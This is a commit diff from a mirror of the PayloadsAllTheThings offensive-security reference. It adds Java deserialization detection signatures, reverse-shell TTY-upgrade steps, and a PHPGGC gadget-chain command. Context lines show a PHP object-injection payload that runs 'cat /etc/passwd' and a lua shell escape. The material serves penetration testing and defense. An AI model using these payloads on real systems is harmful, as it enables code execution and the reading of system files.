mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
PHP Serialization - phpggc
This commit is contained in:
parent
6ca5ff1703
commit
7b49f1b13a
@ -1,5 +1,12 @@
|
||||
# Java Deserialization
|
||||
|
||||
## Detection
|
||||
|
||||
- "AC ED 00 05" in Hex
|
||||
- "rO0" in Base64
|
||||
- Content-type = "application/x-java-serialized-object"
|
||||
- "H4sIAAAAAAAAAJ" in gzip(base64)
|
||||
|
||||
## Exploit
|
||||
|
||||
[ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
|
||||
@ -54,8 +61,12 @@ Additional tools (integration ysoserial with Burp Suite):
|
||||
JRE8u20_RCE_Gadget
|
||||
[https://github.com/pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget)
|
||||
|
||||
JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
|
||||
|
||||
## Thanks to
|
||||
|
||||
- [Github - ysoserial](https://github.com/frohoff/ysoserial)
|
||||
- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
|
||||
- [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
|
||||
- [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
|
||||
- [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
|
@ -151,12 +151,19 @@ lua: os.execute('/bin/sh')
|
||||
```
|
||||
|
||||
Access shortcuts, su, nano and autocomplete in a partially tty shell
|
||||
/!\ OhMyZSH might break this trick
|
||||
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
|
||||
|
||||
```powershell
|
||||
# in host
|
||||
ctrl+z
|
||||
stty raw -echo
|
||||
fg
|
||||
|
||||
# in reverse shell
|
||||
reset
|
||||
export SHELL=bash
|
||||
export TERM=xterm-256color
|
||||
stty rows <num> columns <cols>
|
||||
```
|
||||
|
||||
(From within vi)
|
||||
|
@ -130,8 +130,25 @@ echo urlencode(serialize(new PHPObjectInjection));
|
||||
//'O:18:"PHPObjectInjection":1:{s:6:"inject";s:26:"system(\'cat+/etc/passwd\');";}'
|
||||
```
|
||||
|
||||
## Finding and using gadgets
|
||||
|
||||
[PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks:
|
||||
|
||||
- Laravel
|
||||
- Symfony
|
||||
- SwiftMailer
|
||||
- Monolog
|
||||
- SlimPHP
|
||||
- Doctrine
|
||||
- Guzzle
|
||||
|
||||
```powershell
|
||||
phpggc monolog/rce1 'phpinfo();' -s
|
||||
```
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
|
||||
* [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
|
||||
* [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
|
||||
- [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
|
||||
- [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
|
||||
- [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
|
||||
- [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
|
Loading…
Reference in New Issue
Block a user